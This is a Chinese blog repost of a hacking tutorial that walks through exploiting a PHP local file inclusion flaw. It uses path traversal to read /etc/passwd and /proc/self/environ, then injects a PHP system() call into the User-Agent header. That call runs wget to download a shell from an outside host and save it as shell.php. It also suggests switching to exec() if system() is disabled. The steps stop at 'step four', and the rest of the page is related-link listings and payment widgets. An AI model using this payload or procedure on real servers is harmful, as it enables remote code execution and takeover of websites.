LFI通过proc/self/environ直接获取webshell

最新推荐文章于 2023-10-08 17:26:40 发布
最新推荐文章于 2023-10-08 17:26:40 发布
阅读量1.3k 收藏
点赞数 1
分类专栏: Hacking 文章标签: server firefox include freebsd stream redirect

转自哈克

 

第一步:寻找本地包含漏洞

首先找到一个可能存在本地包含的文件,去check它

比如:     www.website.com/view.php?page=contact.php

替换成   www.website.com/view.php?page=../ 

我们得到一个错误

Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337

翻译下以上的错误信息如下:

警告:包括(../) [function.include]:未能打开流:没有那个文件或目录在/ home / sirgod / public_html / website.com /view.php
说明机会很大,只是不存在文件而已

那么我们就针对服务器存在的文件做检查,比如linux里的/etc/passwd

提交url:www.website.com/view.php?page=../../../etc/passwd 

依旧是:

Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337

所以我们一层层的加上../测试,直到显示为止

www.website.com/view.php?page=../../../../../etc/passwd 

这个时候我们成功的包含了/etc/passwd

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin

第二步:检查proc/self/environ是否可用访问

提交url:www.website.com/view.php?page=../../../../../proc/self/environ

如果看到类似如下信息:

DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.website.com Port 80

说明是可以访问的,如果返回时个空白页,说明是无法访问的,也可能操作系统是FreeBSD

第三步: 注入恶意代码

我们怎么才能把我们的恶意代码注入到proc/self/environ呐?

我们可以注入我们的代码在用户代理HTTP头。 

使用篡改数据用于Firefox的插件改变Firefox的User-Agent.Start篡改数据和请求URL: 
     
www.website.com/view.php?page=../../../../../proc/self/environ 
      
选择User-Agent 写代码如下: 
     
<?system('wget http://hack-bay.com/Shells/gny.txt -O shell.php');?>
         
然后提交请求。 
     
我们的命令将被执行(将下载http://hack-bay.com/Shells/gny.txt,并将其保存为它在shell.php 

网站目录),我们的shell也就被创建,.如果不行,尝试使用exec(),因为系统可能被禁用的从php.ini网络服务器.

第四步:访问我们的shell
7禧
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php lfi /proc/self/environ,PHP安全之LFI漏洞GetShell方法大阅兵
weixin_39646628的博客
04-14 506
然后通过这个插件修改user-agent,如图03:先选择上图的Edit User Agents 然后按照你如图04设置:完成后,访问/proc/self/environ即可。就可以得到shell了。这种方法从个人实践上来说相当的鸡肋。方法二:自己用php写一个socket程序,发送http数据的时候记得修改user-agent选项为你的代码即可,具体的代码和上面第2种方法类似,留给大家去发挥了。...
/proc/self/environ等敏感文件
weixin_45209228的博客
02-26 686
/proc/self/environ等敏感文件
/proc/$pid/environ?
公众号shadow sock7
06-26 3254
参考: https://youtu.be/0TPXvpaiYWc?t=5m59sroot@kali /dev/fd 0 % ll [4:43:15] total 0 dr-x------ 2 root root 0 Jun
linux目录 文件系统,Linux文件系统目录结构
weixin_34981046的博客
04-28 75
本文以CentOS系统为例,但同样适用于Linux的其他发行版。不需要纠结于具体的版本,了解设计意图即可。本文随时更新。除勘误外,不另做批注。概览image.png圆型节点代指目录,方型节点代指文件。图中省去了很多不常用的目录与文件。稍后单独讲/proc目录与/var目录。Linux将整个文件系统看做一棵树,这棵树的树根叫做根文件系统,用"/"表示。目录内容举例/bin供所有用户使用的完成基本维护...
lfi-fuzz:用于枚举并尝试从LFI漏洞获取代码执行的python脚本
05-04
用于枚举并尝试从LFI漏洞获取代码执行的python脚本 用法:lfi-fuzz.py [选项] 选项:-h,--help显示此帮助消息并退出-u URL,--url = URL您要测试的URL: : page LFI --traversal -file = TRAVERSAL_FILE...
LFI.rar_LFI_sick_激光_激光 Visual
09-23
标题中的“LFI.rar_LFI_sick_激光_激光 Visual”暗示了这是一个关于激光技术的项目,其中“LFI”可能是指“激光飞行影像”(Light Field Imaging)或者“本地文件包含”(Local File Inclusion)的安全漏洞,而...
finc:扫描利用lfi漏洞
04-03
芬奇利用python3编写的LFI的开发设置: git clone https://github.com/DSimsek000/finccd finc# recommended setup with virtualenvpython -m venv envsource env/bin/activatepip install -r requirements.txt句法...
toxin:LFI(本地文件包含)漏洞利用工具
05-30
Toxin 是一个 LFI(本地文件包含)/日志污染利用工具。 介绍 Toxin 利用特定(但也是常见)类型的本地文件包含 (LFI) 漏洞,攻击者可以利用该漏洞利用 PHP 的register_globals设置。 在这种攻击场景中,攻击者会...
基于Linux c开发的插件式扫描器
最新发布
07-08
-- (4) File inclusion vulnerability(LFI/RFI) -- (5) Directory traversal attacks -- (6) XPath injection -- (7) Code execution --2)系统服务层面扫描 支持常规的系统服务扫描测试,用于新上线业务系统安全...
[网鼎杯 2020 白虎组]PicDown python反弹shell proc/self目录的信息
m0_64180167的博客
10-08 191
这里确实完全不会 第一次遇到一个只有文件读取思路的题目这里也确实说明还是要学学一些其他的东西了首先打开环境只存在一个框框 我们通过 目录扫描 抓包 注入 发现没有用我们测试能不能任意文件读取发现读取成功其次我到这里就没有思路了我们首先学东西吧当遇到文件读取我们可以读取什么。
docker容器中的环境变量
thlzjfefe的博客
03-10 9047
docker可以为容器配置环境变量。配置的途径有两种: 在制作镜像时,通过ENV命令为镜像增加环境变量。在容器启动时使用该环境变量。 在容器启动时候,通过参数配置环境变量,如果与镜像中有重复的环境变量,会覆盖镜像的环境变量。 使用docker exec {containerID} env即可查看容器中生效的环境变量。 [root@localhost ~]# docker exec 984 ...
文件包含漏洞总结
Shanfenglan's blog
04-06 776
前言 主要有远程文件包含与本地文件包含,一般出现在php环境中。 绕过姿势 参考文章 文件包含漏洞(绕过姿势)
/proc详解--linux man page
逆风飞扬
07-05 5107
proc(5) - Linux man page Name proc - process information pseudo-file system Description The proc file system is a pseudo-file system which is used as an interface to kernel data structures. It is
linux /proc文件系统解析
云守护的专栏
07-11 3624
http://blog.chinaunix.net/uid-21658818-id-96077.html /proc 是一个伪文件系统, 被用作内核数据结构的接口, 而不仅仅是解释说明/dev/kmem. /proc 里的大多数文件都是只读的, 但也可以通过写一些文件来改变内核变量. 下面对整个 /proc 目录作一个大略的介绍. [number] 在 /proc
linux proc 目录清理_Linux下/proc目录详解
weixin_35911307的博客
12-24 1001
Linux下/proc目录详解proc目录总的概述proc下有关进程的目录概述proc下针对Linux系统相关的参数目录概述/proc目录总的概述1.首先,我们可以使用ll命令查看下/proc目录,如下[root@centos6 ~]# ls -l /proctotal 0dr-xr-xr-x. 8 root root 0 May 19 04:02 1dr-xr-xr-...
『Linux』进程信息目录/proc
Ho1aAs‘s Blog
09-12 1313
文章目录一、“一切皆文件”二、/proc/self三、/proc/pid的一些重点目录/文件1、cmdline文件2、cwd软连接3、environ文件4、fd目录参考完 一、“一切皆文件” 接触Linux的时候就听过——一切皆文件,最常见的就是挂载的usb;Linux的一切东西都能通过文件的形式访问,它们在根目录中也有对应的结构,如/dev、/mount,但它们本质都不是文件,但是能通过文件的思想去操控,这是操作系统层面的oop思想 /proc也提供了从文件系统访问进程的一个方法,在当前路径下每个进程拥有
LFI to RCE
10-19
LFI to RCE是指通过本来只能访问服务器上的文件的漏洞(LFI),进一步利用该漏洞实现远程代码执行(RCE)。一般情况下,LFI漏洞只能让攻击者读取服务器上的文件,但是如果攻击者能够找到一个包含可执行代码的文件,就可以通过LFI漏洞执行该代码,从而实现RCE攻击。攻击者可以通过访问服务器上的日志文件等方式获取到包含可执行代码的文件的路径,然后利用LFI漏洞执行该文件中的代码,从而实现RCE攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值